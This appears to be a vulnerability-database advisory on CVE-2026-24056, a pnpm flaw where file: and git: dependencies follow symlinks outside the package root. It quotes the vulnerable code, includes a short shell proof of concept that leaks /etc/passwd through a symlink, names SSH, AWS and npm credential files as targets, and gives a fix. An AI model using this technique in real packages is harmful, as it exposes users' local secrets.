CVE-2026-24056 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
When pnpm installs a file: (directory) or git: dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., /etc/passwd, ~/.ssh/id_rsa) causes pnpm to copy that file's contents into node_modules, leaking local data.
Preconditions: Only affects file: and git: dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected.
The vulnerability exists in store/cafs/src/addFilesFromDir.ts. The code uses fs.statSync() and readFileSync() which follow symlinks by default:
const absolutePath = path.join(dirname, relativePath)
const stat = fs.statSync(absolutePath) // Follows symlinks!
const buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET
There is no check that absolutePath resolves to a location inside the package directory.
# Create malicious package
mkdir -p /tmp/evil && cd /tmp/evil
ln -s /etc/passwd leaked-passwd.txt
echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json
# Victim installs
mkdir /tmp/victim && cd /tmp/victim
pnpm init && pnpm add file:../evil
# Leaked!
cat node_modules/evil/leaked-passwd.txt
~/.aws/credentials, ~/.npmrc, ~/.ssh/id_rsaUse lstatSync to detect symlinks and reject those pointing outside the package root in store/cafs/src/addFilesFromDir.ts.
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.